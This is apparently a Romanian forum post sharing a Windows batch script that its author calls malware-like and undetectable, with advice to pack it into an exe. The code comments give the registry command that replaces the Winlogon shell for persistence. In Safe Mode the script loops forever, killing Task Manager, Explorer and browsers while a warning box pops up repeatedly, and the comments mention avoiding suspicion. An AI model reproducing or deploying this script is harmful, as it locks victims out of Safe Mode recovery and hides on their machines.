Limbaj de programare ? : Batch
Autor : aeae.
Descriere : Previne pornirea sistemului în Safe Mode . Se comportă ca un malware dar este nedetectabil . Odată ce programul este setat pentru a fi persistent, acesta previne boot-ul în Safe Mode prin închiderea aplicațiilor de bază + un mesaj este afișat pe ecranul user-ului. Mai multe detalii puteți vedea în comentariile pe care le-am lăsat în cod. Recomand arhivarea într-un exe.
Cod :
Autor : aeae.
Descriere : Previne pornirea sistemului în Safe Mode . Se comportă ca un malware dar este nedetectabil . Odată ce programul este setat pentru a fi persistent, acesta previne boot-ul în Safe Mode prin închiderea aplicațiilor de bază + un mesaj este afișat pe ecranul user-ului. Mai multe detalii puteți vedea în comentariile pe care le-am lăsat în cod. Recomand arhivarea într-un exe.
Cod :
Code:
@echo off
:: this program has to be invisible to be efficient as well
:: the main program gotta edit Shell REG_SZ from explorer.exe to the location of this program
:: you can do that in batch with the next command
:: REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v "Shell" /t REG_SZ /d "'%location%\prevent.exe'" /f
goto check
:taskkill
taskkill /f /im taskmgr.exe
taskkill /f /im explorer.exe
taskkill /f /im chrome.exe
taskkill /f /im notepad.exe
taskkill /f /im firefox.exe
goto taskkill
:check
powershell gwmi win32_computersystem ^| select BootupState >%temp%\bootmod.txt
cd %temp%
more +3 bootmod.txt >boot_mod.txt
for /f "delims=" %%x in (boot_mod.txt) do set boot=%%x
del bootmod.txt
del boot_mod.txt
if /i "%BOOT%"=="Normal boot" (
start explorer.exe
exit
) ELSE (
echo >%temp%\prevent.vbs Do
echo >>%temp%\prevent.vbs X=MsgBox("Safe Mode is disabled. Reboot.",0+64,"Warning !")
echo >>%temp%\prevent.vbs Loop
start %temp%\prevent.vbs
goto taskkill
)
:: or you could try something more aggressive and efficient like
:: shutdown -r -t 1
:: but i like to keep it all cool 'cause bitch why raise suspicion ? fk me right ?
:: code : aeae.